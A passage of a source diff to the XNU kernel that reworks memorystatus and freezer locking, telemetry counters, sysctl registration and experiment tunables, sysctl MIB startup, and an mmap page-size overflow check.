-4812,7 +4818,7 @@ memorystatus_get_task_phys_footprint_page_counts(task_t task, static bool memorystatus_jetsam_snapshot_copy_entry_locked(memorystatus_jetsam_snapshot_t *dst_snapshot, unsigned int dst_snapshot_size, const memorystatus_jetsam_snapshot_entry_t *src_entry) { - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); assert(dst_snapshot); if (dst_snapshot->entry_count == dst_snapshot_size) { @@ -4831,7 +4837,7 @@ memorystatus_jetsam_snapshot_copy_entry_locked(memorystatus_jetsam_snapshot_t *d static bool memorystatus_init_jetsam_snapshot_entry_with_kill_locked(memorystatus_jetsam_snapshot_t *snapshot, proc_t p, uint32_t kill_cause, uint64_t killtime, memorystatus_jetsam_snapshot_entry_t **entry) { - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); memorystatus_jetsam_snapshot_entry_t *snapshot_list = snapshot->entries; size_t i = snapshot->entry_count; @@ -4863,7 +4869,7 @@ memorystatus_update_jetsam_snapshot_entry_locked(proc_t p, uint32_t kill_cause, bool copied_to_freezer_snapshot = false; #endif /* CONFIG_FREEZE */ - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); if (memorystatus_jetsam_snapshot_count == 0) { /* @@ -5264,7 +5270,7 @@ memorystatus_init_jetsam_snapshot_locked(memorystatus_jetsam_snapshot_t *od_snap memorystatus_jetsam_snapshot_entry_t *snapshot_list = NULL; unsigned int snapshot_max = 0; - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); if (od_snapshot) { /* @@ -5352,7 +5358,7 @@ memorystatus_cmd_set_panic_bits(user_addr_t buffer, size_t buffer_size) static int memorystatus_verify_sort_order(unsigned int bucket_index, pid_t *expected_order, size_t num_pids) { - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); int error = 0; proc_t p = NULL; @@ -6995,7 +7001,7 @@ memorystatus_cmd_get_jetsam_snapshot(int32_t flags, user_addr_t buffer, size_t b */ proc_list_lock(); #if DEVELOPMENT || DEBUG - if (memorystatus_snapshot_owner != 0 && memorystatus_snapshot_owner != current_proc()->p_pid) { + if (memorystatus_testing_pid != 0 && memorystatus_testing_pid != current_proc()->p_pid) { /* Snapshot is currently owned by someone else. Don't consume it. */ proc_list_unlock(); goto out; @@ -7037,27 +7043,27 @@ out: #if DEVELOPMENT || DEBUG static int -memorystatus_cmd_set_jetsam_snapshot_ownership(int32_t flags) +memorystatus_cmd_set_testing_pid(int32_t flags) { int error = EINVAL; proc_t caller = current_proc(); assert(caller != kernproc); proc_list_lock(); - if (flags & MEMORYSTATUS_FLAGS_SNAPSHOT_TAKE_OWNERSHIP) { - if (memorystatus_snapshot_owner == 0) { - memorystatus_snapshot_owner = caller->p_pid; + if (flags & MEMORYSTATUS_FLAGS_SET_TESTING_PID) { + if (memorystatus_testing_pid == 0) { + memorystatus_testing_pid = caller->p_pid; error = 0; - } else if (memorystatus_snapshot_owner == caller->p_pid) { + } else if (memorystatus_testing_pid == caller->p_pid) { error = 0; } else { /* We don't allow ownership to be taken from another proc. */ error = EBUSY; } - } else if (flags & MEMORYSTATUS_FLAGS_SNAPSHOT_DROP_OWNERSHIP) { - if (memorystatus_snapshot_owner == caller->p_pid) { - memorystatus_snapshot_owner = 0; + } else if (flags & MEMORYSTATUS_FLAGS_UNSET_TESTING_PID) { + if (memorystatus_testing_pid == caller->p_pid) { + memorystatus_testing_pid = 0; error = 0; - } else if (memorystatus_snapshot_owner != 0) { + } else if (memorystatus_testing_pid != 0) { /* We don't allow ownership to be taken from another proc. */ error = EPERM; } @@ -7281,6 +7287,13 @@ memorystatus_cmd_grp_set_probabilities(user_addr_t buffer, size_t buffer_size) size_t entry_count = 0, i = 0; memorystatus_internal_probabilities_t *tmp_table_new = NULL, *tmp_table_old = NULL; size_t tmp_table_new_size = 0, tmp_table_old_size = 0; +#if DEVELOPMENT || DEBUG + if (memorystatus_testing_pid != 0 && memorystatus_testing_pid != current_proc()->p_pid) { + /* probabilites are currently owned by someone else. Don't change them. */ + error = EPERM; + goto out; + } +#endif /* (DEVELOPMENT || DEBUG)*/ /* Verify inputs */ if ((buffer == USER_ADDR_NULL) || (buffer_size == 0)) { @@ -7679,7 +7692,7 @@ memorystatus_set_memlimit_properties_internal(proc_t p, memorystatus_memlimit_pr { int error = 0; - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); /* * Store the active limit variants in the proc. @@ -7938,8 +7951,8 @@ memorystatus_control(struct proc *p __unused, struct memorystatus_control_args * error = memorystatus_cmd_get_jetsam_snapshot((int32_t)args->flags, args->buffer, args->buffersize, ret); break; #if DEVELOPMENT || DEBUG - case MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP: - error = memorystatus_cmd_set_jetsam_snapshot_ownership((int32_t) args->flags); + case MEMORYSTATUS_CMD_SET_TESTING_PID: + error = memorystatus_cmd_set_testing_pid((int32_t) args->flags); break; #endif case MEMORYSTATUS_CMD_GET_PRESSURE_STATUS: diff --git a/bsd/kern/kern_memorystatus_freeze.c b/bsd/kern/kern_memorystatus_freeze.c index 1dfa926e9..930b2c3c1 100644 --- a/bsd/kern/kern_memorystatus_freeze.c +++ b/bsd/kern/kern_memorystatus_freeze.c @@ -96,9 +96,8 @@ unsigned long freeze_threshold_percentage = 50; #if CONFIG_FREEZE -lck_grp_attr_t *freezer_lck_grp_attr; -lck_grp_t *freezer_lck_grp; -static lck_mtx_t freezer_mutex; +static LCK_GRP_DECLARE(freezer_lck_grp, "freezer"); +static LCK_MTX_DECLARE(freezer_mutex, &freezer_lck_grp); /* Thresholds */ unsigned int memorystatus_freeze_threshold = 0; @@ -129,60 +128,7 @@ unsigned int memorystatus_thaw_count = 0; /* # of thaws in the current freezer i uint64_t memorystatus_thaw_count_since_boot = 0; /* The number of thaws since boot */ unsigned int memorystatus_refreeze_eligible_count = 0; /* # of processes currently thawed i.e. have state on disk & in-memory */ -/* Freezer counters collected for telemtry */ -static struct memorystatus_freezer_stats_t { - /* - * # of processes that we've considered freezing. - * Used to normalize the error reasons below. - */ - uint64_t mfs_process_considered_count; - - /* - * The following counters track how many times we've failed to freeze - * a process because of a specific FREEZER_ERROR. - */ - /* EXCESS_SHARED_MEMORY */ - uint64_t mfs_error_excess_shared_memory_count; - /* LOW_PRIVATE_SHARED_RATIO */ - uint64_t mfs_error_low_private_shared_ratio_count; - /* NO_COMPRESSOR_SPACE */ - uint64_t mfs_error_no_compressor_space_count; - /* NO_SWAP_SPACE */ - uint64_t mfs_error_no_swap_space_count; - /* pages < memorystatus_freeze_pages_min */ - uint64_t mfs_error_below_min_pages_count; - /* dasd determined it was unlikely to be relaunched. */ - uint64_t mfs_error_low_probability_of_use_count; - /* transient reasons (like inability to acquire a lock). */ - uint64_t mfs_error_other_count; - - /* - * # of times that we saw memorystatus_available_pages <= memorystatus_freeze_threshold. - * Used to normalize skipped_full_count and shared_mb_high_count. - */ - uint64_t mfs_below_threshold_count; - - /* Skipped running the freezer because we were out of slots */ - uint64_t mfs_skipped_full_count; - - /* Skipped running the freezer because we were over the shared mb limit*/ - uint64_t mfs_skipped_shared_mb_high_count; - - /* - * How many pages have not been sent to swap because they were in a shared object? - * This is being used to gather telemtry so we can understand the impact we'd have - * on our NAND budget if we did swap out these pages. - */ - uint64_t mfs_shared_pages_skipped; - - /* - * A running sum of the total number of bytes sent to NAND during - * refreeze operations since boot. - */ - uint64_t mfs_bytes_refrozen; - /* The number of refreeze operations since boot */ - uint64_t mfs_refreeze_count; -} memorystatus_freezer_stats = {0}; +struct memorystatus_freezer_stats_t memorystatus_freezer_stats = {0}; #endif /* XNU_KERNEL_PRIVATE */ @@ -208,6 +154,7 @@ static throttle_interval_t throttle_intervals[] = { }; throttle_interval_t *degraded_throttle_window = &throttle_intervals[0]; throttle_interval_t *normal_throttle_window = &throttle_intervals[1]; +uint32_t memorystatus_freeze_current_interval = 0; extern uint64_t vm_swap_get_free_space(void); extern boolean_t vm_swap_max_budget(uint64_t *); @@ -226,6 +173,7 @@ SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_count, CTLFLAG_RD | CTLFLAG_LOC SYSCTL_UINT(_kern, OID_AUTO, memorystatus_thaw_count, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_thaw_count, 0, ""); SYSCTL_QUAD(_kern, OID_AUTO, memorystatus_thaw_count_since_boot, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_thaw_count_since_boot, ""); SYSCTL_QUAD(_kern, OID_AUTO, memorystatus_freeze_pageouts, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_freeze_pageouts, ""); +SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_interval, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_freeze_current_interval, 0, ""); #if DEVELOPMENT || DEBUG static int sysctl_memorystatus_freeze_budget_pages_remaining SYSCTL_HANDLER_ARGS { @@ -285,27 +233,21 @@ static_assert(_kMemorystatusFreezeSkipReasonMax <= UINT8_MAX); static int sysctl_memorystatus_freezer_thaw_percentage SYSCTL_HANDLER_ARGS { #pragma unused(arg1, arg2) - size_t thaw_count = 0, frozen_count = 0; + uint64_t thaw_count = 0, frozen_count = 0; int thaw_percentage = 100; - unsigned int band = (unsigned int) memorystatus_freeze_jetsam_band; - proc_t p = PROC_NULL; - proc_list_lock(); - - p = memorystatus_get_first_proc_locked(&band, FALSE); + frozen_count = os_atomic_load(&(memorystatus_freezer_stats.mfs_processes_frozen), relaxed); + thaw_count = os_atomic_load(&(memorystatus_freezer_stats.mfs_processes_thawed), relaxed); - while (p) { - if (p->p_memstat_state & P_MEMSTAT_FROZEN) { - if (p->p_memstat_thaw_count > 0) { - thaw_count++; - } - frozen_count++; - } - p = memorystatus_get_next_proc_locked(&band, p, FALSE); - } - proc_list_unlock(); if (frozen_count > 0) { - assert(thaw_count <= frozen_count); - thaw_percentage = (int)(100 * thaw_count / frozen_count); + if (thaw_count > frozen_count) { + /* + * Both counts are using relaxed atomics & could be out of sync + * causing us to see thaw_percentage > 100. + */ + thaw_percentage = 100; + } else { + thaw_percentage = (int)(100 * thaw_count / frozen_count); + } } return sysctl_handle_int(oidp, &thaw_percentage, 0, req); } @@ -313,16 +255,28 @@ SYSCTL_PROC(_kern, OID_AUTO, memorystatus_freezer_thaw_percentage, CTLTYPE_INT | #define FREEZER_ERROR_STRING_LENGTH 128 +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_pages_min, &memorystatus_freeze_pages_min, 0, UINT32_MAX, ""); +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_pages_max, &memorystatus_freeze_pages_max, 0, UINT32_MAX, ""); +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_processes_max, &memorystatus_frozen_processes_max, 0, UINT32_MAX, ""); +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_jetsam_band, &memorystatus_freeze_jetsam_band, JETSAM_PRIORITY_IDLE, JETSAM_PRIORITY_MAX - 1, ""); +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_private_shared_pages_ratio, &memorystatus_freeze_private_shared_pages_ratio, 0, UINT32_MAX, ""); +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_min_processes, &memorystatus_freeze_suspended_threshold, 0, UINT32_MAX, ""); +/* + * max. # of frozen process demotions we will allow in our daily cycle. + */ +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_max_freeze_demotions_daily, &memorystatus_max_frozen_demotions_daily, 0, UINT32_MAX, ""); + +/* + * min # of thaws needed by a process to protect it from getting demoted into the IDLE band. + */ +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_thaw_count_demotion_threshold, &memorystatus_thaw_count_demotion_threshold, 0, UINT32_MAX, ""); + #if DEVELOPMENT || DEBUG -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_jetsam_band, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_jetsam_band, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_daily_mb_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_daily_mb_max, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_degraded_mode, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_freeze_degradation, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_threshold, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_threshold, 0, ""); -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_pages_min, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_pages_min, 0, ""); -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_pages_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_pages_max, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, memorystatus_refreeze_eligible_count, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_refreeze_eligible_count, 0, ""); -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_processes_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_frozen_processes_max, 0, ""); /* * Max. shared-anonymous memory in MB that can be held by frozen processes in the high jetsam band. @@ -334,18 +288,6 @@ SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_shared_mb_max, CTLFLAG_RW | CTL SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_shared_mb, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_frozen_shared_mb, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_shared_mb_per_process_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_shared_mb_per_process_max, 0, ""); -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_private_shared_pages_ratio, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_private_shared_pages_ratio, 0, ""); - -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_min_processes, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_suspended_threshold, 0, ""); - -/* - * max. # of frozen process demotions we will allow in our daily cycle. - */ -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_max_freeze_demotions_daily, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_max_frozen_demotions_daily, 0, ""); -/* - * min # of thaws needed by a process to protect it from getting demoted into the IDLE band. - */ -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_thaw_count_demotion_threshold, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_thaw_count_demotion_threshold, 0, ""); boolean_t memorystatus_freeze_throttle_enabled = TRUE; SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_throttle_enabled, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_throttle_enabled, 0, ""); @@ -462,6 +404,7 @@ again: p->p_memstat_state |= P_MEMSTAT_FROZEN; p->p_memstat_freeze_skip_reason = kMemorystatusFreezeSkipReasonNone; memorystatus_frozen_count++; + os_atomic_inc(&memorystatus_freezer_stats.mfs_processes_frozen, relaxed); if (memorystatus_frozen_count == memorystatus_frozen_processes_max) { memorystatus_freeze_out_of_slots(); } @@ -811,7 +754,7 @@ continue_eval: for (j = 0; j < entry_count; j++) { if (strncmp(memorystatus_global_probabilities_table[j].proc_name, p->p_name, - MAXCOMLEN + 1) == 0) { + MAXCOMLEN) == 0) { probability_of_use = memorystatus_global_probabilities_table[j].use_probability; break; } @@ -1176,11 +1119,6 @@ memorystatus_freeze_init(void) kern_return_t result; thread_t thread; - freezer_lck_grp_attr = lck_grp_attr_alloc_init(); - freezer_lck_grp = lck_grp_alloc_init("freezer", freezer_lck_grp_attr); - - lck_mtx_init(&freezer_mutex, freezer_lck_grp, NULL); - /* * This is just the default value if the underlying * storage device doesn't have any specific budget. @@ -1208,7 +1146,7 @@ memorystatus_is_process_eligible_for_freeze(proc_t p) * Called with proc_list_lock held. */ - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); boolean_t should_freeze = FALSE; uint32_t state = 0, pages = 0; @@ -1332,9 +1270,15 @@ memorystatus_is_process_eligible_for_freeze(proc_t p) if (entry_count) { for (i = 0; i < entry_count; i++) { + /* + * NB: memorystatus_internal_probabilities.proc_name is MAXCOMLEN + 1 bytes + * proc_t.p_name is 2*MAXCOMLEN + 1 bytes. So we only compare the first + * MAXCOMLEN bytes here since the name in the probabilities table could + * be truncated from the proc_t's p_name. + */ if (strncmp(memorystatus_global_probabilities_table[i].proc_name, p->p_name, - MAXCOMLEN + 1) == 0) { + MAXCOMLEN) == 0) { probability_of_use = memorystatus_global_probabilities_table[i].use_probability; break; } @@ -1475,6 +1419,7 @@ memorystatus_freeze_process_sync(proc_t p) p->p_memstat_state |= P_MEMSTAT_FROZEN; p->p_memstat_freeze_skip_reason = kMemorystatusFreezeSkipReasonNone; memorystatus_frozen_count++; + os_atomic_inc(&memorystatus_freezer_stats.mfs_processes_frozen, relaxed); if (memorystatus_frozen_count == memorystatus_frozen_processes_max) { memorystatus_freeze_out_of_slots(); } @@ -1719,6 +1664,7 @@ freeze_process: p->p_memstat_state |= P_MEMSTAT_FROZEN; p->p_memstat_freeze_skip_reason = kMemorystatusFreezeSkipReasonNone; memorystatus_frozen_count++; + os_atomic_inc(&memorystatus_freezer_stats.mfs_processes_frozen, relaxed); if (memorystatus_frozen_count == memorystatus_frozen_processes_max) { memorystatus_freeze_out_of_slots(); } @@ -1863,7 +1809,7 @@ freeze_process: } else { p->p_memstat_state |= P_MEMSTAT_FREEZE_IGNORE; } - memorystatus_freeze_handle_error(p, p->p_memstat_state & P_MEMSTAT_FROZEN, freezer_error_code, aPid, coal, "memorystatus_freeze_top_process"); + memorystatus_freeze_handle_error(p, freezer_error_code, p->p_memstat_state & P_MEMSTAT_FROZEN, aPid, coal, "memorystatus_freeze_top_process"); proc_rele_locked(p); @@ -1899,6 +1845,33 @@ freeze_process: return ret; } +#if DEVELOPMENT || DEBUG +/* For testing memorystatus_freeze_top_process */ +static int +sysctl_memorystatus_freeze_top_process SYSCTL_HANDLER_ARGS +{ +#pragma unused(arg1, arg2) + int error, val; + /* + * Only freeze on write to prevent freezing during `sysctl -a`. + * The actual value written doesn't matter. + */ + error = sysctl_handle_int(oidp, &val, 0, req); + if (error || !req->newptr) { + return error; + } + lck_mtx_lock(&freezer_mutex); + int ret = memorystatus_freeze_top_process(); + lck_mtx_unlock(&freezer_mutex); + if (ret == -1) { + ret = ESRCH; + } + return ret; +} +SYSCTL_PROC(_vm, OID_AUTO, memorystatus_freeze_top_process, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED, + 0, 0, &sysctl_memorystatus_freeze_top_process, "I", ""); +#endif /* DEVELOPMENT || DEBUG */ + static inline boolean_t memorystatus_can_freeze_processes(void) { @@ -2146,7 +2119,7 @@ static void memorystatus_freeze_mark_eligible_processes_with_skip_reason(memorystatus_freeze_skip_reason_t reason, bool locked) { LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED); - LCK_MTX_ASSERT(proc_list_mlock, locked ? LCK_MTX_ASSERT_OWNED : LCK_MTX_ASSERT_NOTOWNED); + LCK_MTX_ASSERT(&proc_list_mlock, locked ? LCK_MTX_ASSERT_OWNED : LCK_MTX_ASSERT_NOTOWNED); unsigned int band = JETSAM_PRIORITY_IDLE; proc_t p; @@ -2225,7 +2198,7 @@ static void memorystatus_freeze_start_normal_throttle_interval(uint32_t new_budget, mach_timespec_t start_ts) { LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED); - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); normal_throttle_window->max_pageouts = new_budget; normal_throttle_window->ts.tv_sec = normal_throttle_window->mins * 60; @@ -2239,6 +2212,13 @@ memorystatus_freeze_start_normal_throttle_interval(uint32_t new_budget, mach_tim } /* Ensure the normal window is now active. */ memorystatus_freeze_degradation = FALSE; + memorystatus_freezer_stats.mfs_shared_pages_skipped = 0; + /* + * Reset the thawed percentage to 0 so we re-evaluate in the new interval. + */ + os_atomic_store(&memorystatus_freezer_stats.mfs_processes_thawed, 0, release); + os_atomic_store(&memorystatus_freezer_stats.mfs_processes_frozen, memorystatus_frozen_count, release); + os_atomic_inc(&memorystatus_freeze_current_interval, release); } #if DEVELOPMENT || DEBUG @@ -2273,7 +2253,7 @@ static void memorystatus_freeze_out_of_budget(const struct throttle_interval_t *interval) { LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED); - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); mach_timespec_t time_left = {0, 0}; mach_timespec_t now_ts; @@ -2302,7 +2282,7 @@ static void memorystatus_freeze_out_of_slots(void) { LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED); - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); assert(memorystatus_frozen_count == memorystatus_frozen_processes_max); os_log(OS_LOG_DEFAULT, @@ -2338,7 +2318,7 @@ memorystatus_freeze_update_throttle(uint64_t *budget_pages_allowed) clock_nsec_t nsec; mach_timespec_t now_ts; LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED); - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); unsigned int freeze_daily_pageouts_max = 0; uint32_t budget_rollover = 0; @@ -2386,7 +2366,6 @@ memorystatus_freeze_update_throttle(uint64_t *budget_pages_allowed) interval->mins, budget_rollover), now_ts); *budget_pages_allowed = interval->max_pageouts; - memorystatus_freezer_stats.mfs_shared_pages_skipped = 0; memorystatus_demote_frozen_processes(FALSE); /* normal mode...don't force a demotion */ } else { diff --git a/bsd/kern/kern_mib.c b/bsd/kern/kern_mib.c index 85ffba28d..691e11732 100644 --- a/bsd/kern/kern_mib.c +++ b/bsd/kern/kern_mib.c @@ -140,7 +140,7 @@ static int cputhreadtype, cpu64bit; static uint64_t cacheconfig[10], cachesize[10]; static int packages; -static char * osenvironment; +static char * osenvironment = NULL; static uint32_t osenvironment_size = 0; static int osenvironment_initialized = 0; @@ -152,21 +152,21 @@ static struct { uint32_t use_recovery_securityd:1; } property_existence = {0, 0}; -SYSCTL_NODE(, 0, sysctl, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, 0, sysctl, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "Sysctl internal magic"); -SYSCTL_NODE(, CTL_KERN, kern, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, CTL_KERN, kern, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "High kernel, proc, limits &c"); -SYSCTL_NODE(, CTL_VM, vm, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, CTL_VM, vm, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "Virtual memory"); -SYSCTL_NODE(, CTL_VFS, vfs, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, CTL_VFS, vfs, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "File system"); -SYSCTL_NODE(, CTL_NET, net, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, CTL_NET, net, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "Network, (see socket.h)"); -SYSCTL_NODE(, CTL_DEBUG, debug, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, CTL_DEBUG, debug, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "Debugging"); SYSCTL_NODE(, CTL_HW, hw, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "hardware"); -SYSCTL_NODE(, CTL_MACHDEP, machdep, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, CTL_MACHDEP, machdep, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "machine dependent"); SYSCTL_NODE(, CTL_USER, user, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "user-level"); @@ -475,11 +475,14 @@ sysctl_tbfrequency return sysctl_io_number(req, l, sizeof(l), NULL, NULL); } +/* + * Called by IOKit on Intel, or by sysctl_load_devicetree_entries() + */ void sysctl_set_osenvironment(unsigned int size, const void* value) { if (osenvironment_size == 0 && size > 0) { - MALLOC(osenvironment, char *, size, M_TEMP, M_WAITOK); + osenvironment = zalloc_permanent(size, ZALIGN_NONE); if (osenvironment) { memcpy(osenvironment, value, size); osenvironment_size = size; @@ -501,7 +504,8 @@ sysctl_unblock_osenvironment(void) * PE_init_iokit(). Doing this also avoids the extern-C hackery to access these entries * from IORegistry (which requires C++). */ -void +__startup_func +static void sysctl_load_devicetree_entries(void) { DTEntry chosen; @@ -514,11 +518,7 @@ sysctl_load_devicetree_entries(void) /* load osenvironment */ if (kSuccess == SecureDTGetProperty(chosen, "osenvironment", (void const **) &value, &size)) { - MALLOC(osenvironment, char *, size, M_TEMP, M_WAITOK); - if (osenvironment) { - memcpy(osenvironment, value, size); - osenvironment_size = size; - } + sysctl_set_osenvironment(size, value); } /* load ephemeral_storage */ @@ -537,6 +537,7 @@ sysctl_load_devicetree_entries(void) } } } +STARTUP(SYSCTL, STARTUP_RANK_MIDDLE, sysctl_load_devicetree_entries); static int sysctl_osenvironment @@ -745,7 +746,7 @@ SYSCTL_INT(_hw_optional, OID_AUTO, floatingpoint, CTLFLAG_RD | CTLFLAG_KERN | CT /* * Optional device hardware features can be registered by drivers below hw.features */ -SYSCTL_NODE(_hw, OID_AUTO, features, CTLFLAG_RD | CTLFLAG_LOCKED, NULL, "hardware features"); +SYSCTL_EXTENSIBLE_NODE(_hw, OID_AUTO, features, CTLFLAG_RD | CTLFLAG_LOCKED, NULL, "hardware features"); /* * Deprecated variables. These are supported for backwards compatibility @@ -912,7 +913,6 @@ SYSCTL_INT(_hw_optional, OID_AUTO, arm64, CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LO void sysctl_mib_init(void) { - cputhreadtype = cpu_threadtype(); #if defined(__i386__) || defined (__x86_64__) cpu64bit = (_get_cpu_capabilities() & k64Bit) == k64Bit; #elif defined(__arm__) || defined (__arm64__) @@ -921,18 +921,6 @@ sysctl_mib_init(void) #error Unsupported arch #endif - /* - * Populate the optional portion of the hw.* MIB. - * - * XXX This could be broken out into parts of the code - * that actually directly relate to the functions in - * question. - */ - - if (cputhreadtype != CPU_THREADTYPE_NONE) { - sysctl_register_oid(&sysctl__hw_cputhreadtype); - } - #if defined (__i386__) || defined (__x86_64__) /* hw.cacheconfig */ cacheconfig[0] = ml_cpu_cache_sharing(0); @@ -976,8 +964,28 @@ sysctl_mib_init(void) cachesize[4] = 0; packages = 1; - #else #error unknown architecture #endif /* !__i386__ && !__x86_64 && !__arm__ && !__arm64__ */ } + +__startup_func +static void +sysctl_mib_startup(void) +{ + cputhreadtype = cpu_threadtype(); + + /* + * Populate the optional portion of the hw.* MIB. + * + * XXX This could be broken out into parts of the code + * that actually directly relate to the functions in + * question. + */ + + if (cputhreadtype != CPU_THREADTYPE_NONE) { + sysctl_register_oid_early(&sysctl__hw_cputhreadtype); + } + +} +STARTUP(SYSCTL, STARTUP_RANK_MIDDLE, sysctl_mib_startup); diff --git a/bsd/kern/kern_mman.c b/bsd/kern/kern_mman.c index 9e9e8f8f2..0cc17e529 100644 --- a/bsd/kern/kern_mman.c +++ b/bsd/kern/kern_mman.c @@ -273,7 +273,7 @@ mmap(proc_t p, struct mmap_args *uap, user_addr_t *retval) /* make sure mapping fits into numeric range etc */ - if (os_add3_overflow(file_pos, user_size, PAGE_SIZE_64 - 1, &sum)) { + if (os_add3_overflow(file_pos, user_size, vm_map_page_size(user_map) - 1, &sum)) { return EINVAL; } @@ -850,10 +850,10 @@ bad: } KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_SC_EXTENDED_INFO, SYS_mmap) | DBG_FUNC_NONE), fd, (uint32_t)(*retval), (uint32_t)user_size, error, 0); -#ifndef CONFIG_EMBEDDED +#if XNU_TARGET_OS_OSX KERNEL_DEBUG_CONSTANT((BSDDBG_CODE(DBG_BSD_SC_EXTENDED_INFO2, SYS_mmap) | DBG_FUNC_NONE), (uint32_t)(*retval >> 32), (uint32_t)(user_size >> 32), (uint32_t)(file_pos >> 32), (uint32_t)file_pos, 0); 